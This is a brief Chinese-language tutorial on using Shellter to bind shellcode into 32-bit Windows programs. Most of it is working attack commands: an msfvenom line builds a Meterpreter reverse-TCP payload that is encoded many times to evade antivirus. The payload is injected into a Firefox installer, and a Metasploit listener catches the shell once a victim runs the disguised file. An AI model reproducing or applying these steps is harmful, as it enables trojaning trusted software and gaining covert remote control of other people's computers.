Shellter

Shellter是一个动态的shellcode注入工具。它可用于将shellcode捆绑注入本机Windows应用程序(仅限于32位应用程序)。shellcode也可以通过Metasploit生成的payload免杀。

准备

  • 使用kali linux
  • 安装 shellter
    apt install shellter
    或者 官网下载

1.使用Metasploit生成 payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=1337 -e x86/shikata_ga_nai -i 43 -f raw -o fud.raw

2.使用Shellter选择捆绑exe文件

  • 目录下放置一个32位的exe程序,我以Firefox-latest.exe 为例

3.把 fud.raw 注入到exe程序

4.启动Metasploit监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
set lport 1337
exploit

* 启动监听之后,把目录下的 Firefox-latest.exe 文件放置 windows 电脑下运行即可主机上线

  • 杀毒引擎扫描结果